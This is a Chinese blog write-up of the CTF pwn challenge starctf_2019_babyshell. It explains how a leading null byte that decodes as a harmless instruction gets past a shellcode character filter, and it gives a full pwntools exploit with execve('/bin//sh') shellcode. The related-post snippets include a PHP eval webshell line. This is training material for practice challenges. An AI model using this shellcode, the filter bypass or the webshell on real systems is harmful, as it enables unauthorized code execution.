starctf_2019_babyshell

已于 2023-08-24 18:42:44 修改
阅读量98 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
于 2023-08-24 11:32:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132470743
版权

starctf_2019_babyshell

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

可改got,没有canary,不可执行栈,没开pie

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  void *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8(a1, a2, a3);
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

buf设置了可执行,所以往里面写shellcode就可以直接执行

__int64 __fastcall sub_400786(_BYTE *a1)
{
  _BYTE *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = &unk_400978; *i && *i != *a1; ++i )
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

当a1=0直接绕过这个,所以我们的在shellcode前面需要\x00

但是直接单一的\x00会妨碍shellcode的执行

我们需要组成一个汇编指令,一来是绕过检测,二来是不妨碍shellcode

介绍一个pwntools命令(借鉴

pwn disasm -c arch hex-string

pwn disasm -c amd64 004200

exp

from pwn import*
from Yapack import *

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26578,"./pwn",10)
 
pl=b'\x00\x42\x00'+b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
sl(pl)
#debug()

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
starctf 2019 hackme
weixin_46483787的博客
04-19 2567
学kernel的第四天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写四个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写
BUUCTF(pwn)starctf_2019_babyshell
半岛铁盒的博客
04-06 351
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句。 所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p...
BUUCTF之“starctf_2019_babyshell
Probeginner的博客
12-21 360
shellcode的强化
[BUUCTF]-PWN:starctf_2019_babyshell解析(汇编\x00开头绕过+shellcode)
2301_79326813的博客
03-05 313
查看保护查看ida这里就是要输入shellcode,但是函数会有检测。在shellcode前面构造一个以\x00机器码开头的汇编指令,这样就可以绕过函数检查了。
CTF编写
02-15
cce-babyshell,simple_cmdshell,simple_pwn,simple_rop,simple_uaf,tpu dreamhack-检查标志 hacklu-sparc 卡夫-shadowstack kapo-cnc,ezbof pctf-emojidb,ipppc,mojo seccon-加密器,kstack,kvdb ...
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 518
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的四个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
[BUUCTF]PWN——starctf_2019_babyshell(有限制的shellcode)
mcmuyanga的博客
03-23 869
starctf_2019_babyshell 例行检查,64位程序,开启了nx main函数,往buf里写入shellcode,然后程序会执行shellcod sub_400786(),这个函数会对我们输入的shellcode进行检查 检查的时候*i即可退出,可以使用\x00来绕过。 ...
large bin attack & house of strom
seaaseesa的博客
06-12 1125
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
[BUUCTF-pwn]——starctf_2019_babyshell
Y_peak的博客
04-02 516
[BUUCTF-pwn]——starctf_2019_babyshell 学到了, 又学到了FMYY师傅太强了 只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好 **\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) #p = process("./starctf
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 566
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
buuoj刷题记录 - starctf_2019_babyshell
qq_34010404的博客
03-31 171
输入shellcode ,然后检查shellcode 只要shellcode第一个字节是0就可以了,但是必须是有效的指令,否则无法识别会导致程序崩掉。 先填一个\x00看一下,对应的opcode 是add 后面的shellcode已经无法识别了. 看一下intel开发手册,找到add指令 可以看到对应的opcode是00,把后面的操作数补全(随便找个可以写的地址就行)就不会影响后面shellcode的解析了. 然后就可以getshell啦 Volume_2_325383_NoRestrictio
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2574
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUUCTF刷题7
m0_51251108的博客
11-09 342
题目:护网杯_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网杯_2018_gettingstart:(浮点数内存表示) 参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀
*CTF 2019 quicksort、babyshell、upxofcpp
weixin_30341735的博客
04-29 174
这次参加比赛总共出了三道,有两道队友都先交了,还是tcl,heap_master卡了差不多一天没解决。。。。还是记录一下出的题目吧 quicksort 题目大体流程就是输入要输入的数字数量,然后输入数字,经过一个快速排序输出,然后结束。 漏洞: gets函数这里存在栈溢出,可以覆盖i,j,ptr,num。 利用思路: libc泄露:可以修改ptr指向gets_got,并将i和n...
[GXYCTF2019]BabyUpload
夜幕下的灯火阑珊的博客
05-13 3335
png文件不许上传,尝试上传jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_POST[cmd]);</script> ...
Lianwei 安全周报|2024.07.22
最新发布
联蔚盘云的博客
07-22 566
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值